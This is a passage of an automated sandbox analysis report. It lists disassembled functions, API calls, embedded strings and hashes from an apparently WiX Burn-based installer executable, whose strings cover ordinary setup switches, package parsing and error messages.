                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                          • Opcode ID: ac0fa4a46b9056238730257a65794a073d8259118b9e92c9a6b382df4373ee03
                                                                                                                                                          • Instruction ID: 7388967fa739813f22058abd9f70496790e580b82c45e154ba833a961978623e
                                                                                                                                                          • Opcode Fuzzy Hash: ac0fa4a46b9056238730257a65794a073d8259118b9e92c9a6b382df4373ee03
                                                                                                                                                          • Instruction Fuzzy Hash: E5B01291A9E1017C7304B60B9C06E37019CC4C4B15330C17FF004D50C2D5AC3C49007F
                                                                                                                                                          Function 00407B80 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00407B67
                                                                                                                                                            • Part of subcall function 00407E32: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00407EA5
                                                                                                                                                            • Part of subcall function 00407E32: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00407EB6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                          • Opcode ID: 35fa128ce7f6941b1a4b3100e86be977ef884829f9f979875d9f48ebb6ee317b
                                                                                                                                                          • Instruction ID: 76bdb074a99ac5d2bffd236de8f911398db8a87c0c99ba5f090a8de11e45ec09
                                                                                                                                                          • Opcode Fuzzy Hash: 35fa128ce7f6941b1a4b3100e86be977ef884829f9f979875d9f48ebb6ee317b
                                                                                                                                                          • Instruction Fuzzy Hash: B5B01281A9E001AC7204F60B9C06E37019CC4C4B15330C03FF404D50C2D5AC7C01007F
                                                                                                                                                          Function 00439060 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNELBASE(000000FF,?,?), ref: 0043909C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: 8e560eb7e2cea2e6f868d9a85b39a69251601d0cdc036ce6e22824cde906dcba
                                                                                                                                                          • Instruction ID: a0849ab5ee6fe3f0147351845b08cc10918962339712702988032051b2f26537
                                                                                                                                                          • Opcode Fuzzy Hash: 8e560eb7e2cea2e6f868d9a85b39a69251601d0cdc036ce6e22824cde906dcba
                                                                                                                                                          • Instruction Fuzzy Hash: C1F039311102049FCB109F69C848F553BE4AB08335F558268E9188B2B2C778D860CE54

                                                                                                                                                          Non-executed Functions

                                                                                                                                                          Function 00423268 Relevance: 242.8, APIs: 72, Strings: 66, Instructions: 1348stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,00000002,000000FF,00486CB8,000000FF,004087CC,004087E8,004080B0,00000000,?,?), ref: 004232CC
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,log,000000FF), ref: 004232EF
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,xlog,000000FF), ref: 00423312
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,00486EA0,000000FF), ref: 00423335
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,00486EA4,000000FF), ref: 00423358
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,help,000000FF), ref: 0042337B
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,00486EB4,000000FF), ref: 0042339E
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,quiet,000000FF), ref: 004233C1
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,00486EC4,000000FF), ref: 004233E4
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,silent,000000FF), ref: 00423407
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,passive,000000FF), ref: 0042342A
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,layout,000000FF), ref: 004234BF
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,unsafeuninstall,000000FF), ref: 0042354B
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,uninstall,000000FF), ref: 00423586
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,repair,000000FF), ref: 004235C1
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,modify,000000FF), ref: 004235FC
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,package,000000FF), ref: 00423637
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,update,000000FF), ref: 0042365A
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,noaupause,000000FF), ref: 0042367D
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,keepaupaused,000000FF), ref: 004236A8
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,disablesystemrestore,000000FF), ref: 004236DC
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,originalsource,000000FF), ref: 0042370A
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,parent,000000FF), ref: 0042376B
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,parent:none,000000FF), ref: 004237CC
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.log.append,000000FF), ref: 0042381F
                                                                                                                                                          • lstrlenW.KERNEL32(burn.log.mode,burn.log.mode,000000FF), ref: 00423867
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00423879
                                                                                                                                                          • lstrlenW.KERNEL32(burn.log.mode), ref: 0042388D
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.elevated,000000FF), ref: 0042393A
                                                                                                                                                          • lstrlenW.KERNEL32(burn.system.component), ref: 00423A29
                                                                                                                                                          • lstrlenW.KERNEL32(burn.system.component,burn.system.component,00000000), ref: 00423A37
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00423A49
                                                                                                                                                          • lstrlenW.KERNEL32(burn.system.component), ref: 00423A59
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.embedded,000000FF), ref: 00423ACE
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.detect,000000FF), ref: 00423B5C
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.upgrade,000000FF), ref: 00423B9F
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,burn.related.addon,000000FF), ref: 00423BBF
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.dependent.addon,000000FF), ref: 00423BE3
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.patch,000000FF), ref: 00423C06
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.dependent.patch,000000FF), ref: 00423C29
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.update,000000FF), ref: 00423C4C
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.related.chain.package,000000FF), ref: 00423C72
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.passthrough,000000FF), ref: 00423C98
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,burn.runonce,000000FF), ref: 00423CC6
                                                                                                                                                          • lstrlenW.KERNEL32(burn.ignoredependencies), ref: 00423D21
                                                                                                                                                          • lstrlenW.KERNEL32(burn.ignoredependencies,burn.ignoredependencies,00000000), ref: 00423D2F
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00423D41
                                                                                                                                                          • lstrlenW.KERNEL32(burn.ignoredependencies), ref: 00423D51
                                                                                                                                                          • lstrlenW.KERNEL32(burn.ancestors), ref: 00423DC6
                                                                                                                                                          • lstrlenW.KERNEL32(burn.ancestors,burn.ancestors,00000000), ref: 00423DD4
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00423DE6
                                                                                                                                                          • lstrlenW.KERNEL32(burn.ancestors), ref: 00423DF6
                                                                                                                                                          • lstrlenW.KERNEL32(burn.engine.working.directory), ref: 00423E6E
                                                                                                                                                          • lstrlenW.KERNEL32(burn.engine.working.directory,burn.engine.working.directory,00000000), ref: 00423E7C
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00423E8E
                                                                                                                                                          • lstrlenW.KERNEL32(burn.engine.working.directory), ref: 00423E9E
                                                                                                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached), ref: 00423F09
                                                                                                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000), ref: 00423F17
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00423F29
                                                                                                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached), ref: 00423F3D
                                                                                                                                                          • lstrlenW.KERNEL32(burn.filehandle.self), ref: 00423FC8
                                                                                                                                                          • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000), ref: 00423FD6
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00423FE8
                                                                                                                                                          • lstrlenW.KERNEL32(burn.filehandle.self), ref: 00423FF8
                                                                                                                                                          • lstrlenW.KERNEL32(burn.splash.screen), ref: 00424071
                                                                                                                                                          • lstrlenW.KERNEL32(burn.splash.screen,burn.splash.screen,00000000), ref: 0042407F
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00424091
                                                                                                                                                          • lstrlenW.KERNEL32(burn.splash.screen), ref: 004240A1
                                                                                                                                                          • lstrlenW.KERNEL32(burn.), ref: 00424120
                                                                                                                                                          • lstrlenW.KERNEL32(burn.,burn.,00000000), ref: 0042412E
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000000), ref: 00424140
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString$lstrlen
                                                                                                                                                          • String ID: Failed to allocate the list of ancestors.$Failed to allocate the list of dependencies to ignore.$Failed to copy append log file path.$Failed to copy last used source.$Failed to copy log file path.$Failed to copy parent.$Failed to copy path for layout directory.$Failed to ensure size for secret args.$Failed to ensure size for unknown args.$Failed to initialize parent to none.$Failed to parse elevated connection.$Failed to parse embedded connection.$Failed to parse file handle: '%ls'$Failed to parse splash screen window: '%ls'$Failed to store the custom working directory.$Invalid switch: %ls$Missing required parameter for switch: %ls$Multiple mode command-line switches were provided.$Must specify a path for append log.$Must specify a path for log.$Must specify a path for original source.$Must specify a value for parent.$Must specify the elevated name, token and parent process id.$Must specify the embedded name, token and parent process id.$burn.$burn.ancestors$burn.elevated$burn.embedded$burn.engine.working.directory$burn.filehandle.attached$burn.filehandle.self$burn.ignoredependencies$burn.log.append$burn.log.mode$burn.passthrough$burn.related.addon$burn.related.chain.package$burn.related.dependent.addon$burn.related.dependent.patch$burn.related.detect$burn.related.patch$burn.related.update$burn.related.upgrade$burn.runonce$burn.splash.screen$burn.system.component$d:\a\wix\wix\src\burn\engine\core.cpp$disablesystemrestore$help$keepaupaused$layout$log$modify$noaupause$originalsource$package$parent$parent:none$passive$quiet$repair$silent$uninstall$unsafeuninstall$update$xlog
                                                                                                                                                          • API String ID: 1657112622-3494894374
                                                                                                                                                          • Opcode ID: a55a3338bd059bfdf5254fabf150cf1d04fc16abf06028a9a504282915b8a153
                                                                                                                                                          • Instruction ID: a8e92d22a7392b731e9223cf984fc9e15dab52e697960c60d76f6ee4aea655dd
                                                                                                                                                          • Opcode Fuzzy Hash: a55a3338bd059bfdf5254fabf150cf1d04fc16abf06028a9a504282915b8a153
                                                                                                                                                          • Instruction Fuzzy Hash: DEA21471744220BBDB209F44DC4AF6A3375EB04B21FE04656FA65BB2D1D2BCED818B19
                                                                                                                                                          Function 0041302B Relevance: 179.7, APIs: 35, Strings: 67, Instructions: 1199COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00413EDF
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,DirectorySearch,000000FF,00000000,Condition,00409614,00000000,Variable,00409610,00000000,0047B210,0040960C,0040960C), ref: 004131B6
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,exists,00000000,00000000,Type,00000000,00000000,Path,00409620), ref: 00413225
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,path,00000000), ref: 00413242
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,FileSearch,000000FF), ref: 00413268
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,00000000,exists,00000000,00000000,Type,00000000,00000000,DisableFileRedirection,00409624,00000000,Path,00409620), ref: 00413306
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00413A41
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$Compare$FreeHeap$AllocProcess
                                                                                                                                                          • String ID: ComponentId$Condition$DirectorySearch$DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch|ExtensionSearch|SetVariable$DisableFileRedirection$ExpandEnvironment$ExtensionId$ExtensionSearch$Failed to allocate memory for search structs.$Failed to find extension '%ls' for search '%ls'$Failed to get @ComponentId.$Failed to get @Condition.$Failed to get @ExpandEnvironment.$Failed to get @ExtensionId.$Failed to get @Id.$Failed to get @Path.$Failed to get @ProductCode or @UpgradeCode.$Failed to get @ProductCode.$Failed to get @Root.$Failed to get @Type.$Failed to get @UpgradeCode.$Failed to get @Value.$Failed to get @Variable.$Failed to get @VariableType.$Failed to get DisableFileRedirection attribute.$Failed to get Key attribute.$Failed to get Value attribute.$Failed to get Win64 attribute.$Failed to get next node.$Failed to get search node count.$Failed to select search nodes.$FileSearch$HKCR$HKCU$HKLM$HKU$Invalid value for @Root: %ls$Invalid value for @Type: %ls$Invalid value for @VariableType: %ls$Key$MsiComponentSearch$MsiProductSearch$Path$ProductCode$RegistrySearch$Root$SetVariable$Type$Unexpected element name: %ls$UpgradeCode$Value$Variable$VariableType$Win64$assignment$d:\a\wix\wix\src\burn\engine\search.cpp$directory$exists$formatted$keyPath$language$numeric$path$state$string$value$version
                                                                                                                                                          • API String ID: 876487704-2869811979
                                                                                                                                                          • Opcode ID: 511bcd34df386020127fbaefa271fd78cdf2117a1adbf202c0bdac08b4e368fe
                                                                                                                                                          • Instruction ID: 577ec144764d8ee8ed200fe4c02b32dd0145466c09346615437649bd7cdce7b2
                                                                                                                                                          • Opcode Fuzzy Hash: 511bcd34df386020127fbaefa271fd78cdf2117a1adbf202c0bdac08b4e368fe
                                                                                                                                                          • Instruction Fuzzy Hash: C2823E31B40214B6D7205E518C4AFDF3A2ADB85B15F2141ABF608BB2D1D7BD4E81C7AD
                                                                                                                                                          Function 004153DD Relevance: 146.4, APIs: 12, Strings: 71, Instructions: 1119COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0041559B
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0041618F
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeHeapString$AllocProcess
                                                                                                                                                          • String ID: %ls_Compatible$BundlePackage$Cache$CacheId$Chain/BundlePackage|Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to format log path variable for compatible package.$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RepairCondition.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Transaction.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse BUNDLE package.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$Invalid package type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$Non-permanent packages must be uninstallable.$PerMachine$Permanent$RepairCondition$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Transaction$Vital$clbcatq.dll$comres.dll$crypt32.dll$d:\a\wix\wix\src\burn\engine\package.cpp$feclient.dll$force$keep$msasn1.dll$remove$version.dll$wininet.dll
                                                                                                                                                          • API String ID: 3351553325-4120539620
                                                                                                                                                          • Opcode ID: afe351ebb04b77c6fcee619c15ce535f25c7db605f08761358de2f19cb1b3233
                                                                                                                                                          • Instruction ID: f48a601c7569854937c08f90b7a69e7527a0dec13a95de9d9b4ac9c3bf4d5fa0
                                                                                                                                                          • Opcode Fuzzy Hash: afe351ebb04b77c6fcee619c15ce535f25c7db605f08761358de2f19cb1b3233
                                                                                                                                                          • Instruction Fuzzy Hash: 48721231A40715FBD7119A14CC46FEF76AAAB84714F21403BF609BB2D0EBBDAD81865C
                                                                                                                                                          Function 0043D0DA Relevance: 80.3, APIs: 1, Strings: 52, Instructions: 844COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,00000000,?,?,?,?,?,00000000,00000000,?,000000B0,00000000,00000000,8000FFFF,?,000000B0), ref: 0043DB1F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID: -%ls$ -%ls=%ls$ -%ls=ALL$ -norestart$"%ls"$$yG$%hs is null.$%ls %ls$Failed to allocate base command.$Failed to allocate obfuscated exe command.$Failed to append %ls$Failed to append argument from ARP.$Failed to append norestart argument.$Failed to append the custom working directory to the exepackage command line.$Failed to append the list of ancestors to the command line.$Failed to append the list of dependencies to ignore to the command line.$Failed to append the relation type to the command line.$Failed to build executable path.$Failed to copy executable path.$Failed to copy package arguments.$Failed to evaluate executable package command-line condition.$Failed to format argument string.$Failed to format obfuscated argument string.$Failed to get cached path for package: %ls$Failed to get command-line argument for install.$Failed to get command-line argument for repair.$Failed to get command-line argument for uninstall.$Failed to get parent directory for QuietUninstallString executable path: %ls$Failed to get parent directory for pseudo-package: %ls$Failed to parse QuietUninstallString: %ls.$Failed to query ArpEntry for %hs.$Failed to run EXE process$Failed to run exe with Burn protocol from path: %ls$Failed to run netfx chainer: %ls$Failed to separate command-line arguments.$Failed to verify the QuietUninstallString executable path is in a secure location: %ls$Invalid Exe package action: %d.$Process returned error: 0x%x$Pseudo ExePackages must have a fully qualified target path.$QuietUninstallString$QuietUninstallString must contain an executable path.$The QuietUninstallString executable path is not in a secure location: %ls$UninstallString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$burn.ancestors$burn.filehandle.self$burn.ignoredependencies$burn.related.chain.package$d:\a\wix\wix\src\burn\engine\exeengine.cpp$install$uninstall
                                                                                                                                                          • API String ID: 2962429428-3240411882
                                                                                                                                                          • Opcode ID: ea665492716833f1256a29a298ee56cab184abea51e99a4d970bb6ffa3eeb319
                                                                                                                                                          • Instruction ID: 1aa1d199bc1b9ee4905d7ef44b542dc34a19831184c003684ebd1e762046cbc5
                                                                                                                                                          • Opcode Fuzzy Hash: ea665492716833f1256a29a298ee56cab184abea51e99a4d970bb6ffa3eeb319
                                                                                                                                                          • Instruction Fuzzy Hash: 2252E331E40215BBDF229E94DC4AFEF7A78AB08714F10016BFA04BA1D1D7B99D50CB99
                                                                                                                                                          Function 0043E293 Relevance: 77.5, APIs: 6, Strings: 38, Instructions: 532COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0046B18E: VariantInit.OLEAUT32(?), ref: 0046B1A5
                                                                                                                                                            • Part of subcall function 0046B18E: VariantClear.OLEAUT32(?), ref: 0046B2F0
